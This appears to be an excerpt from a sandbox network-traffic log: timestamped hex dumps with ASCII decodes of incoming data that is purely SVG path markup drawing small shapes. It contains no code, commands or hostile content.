                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7305INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7321INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7337INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7353INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7369INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7385INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7401INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7417INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7433INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                                        Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7449INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7465INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7481INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7497INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                                        Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7513INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7529INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7545INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7561INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
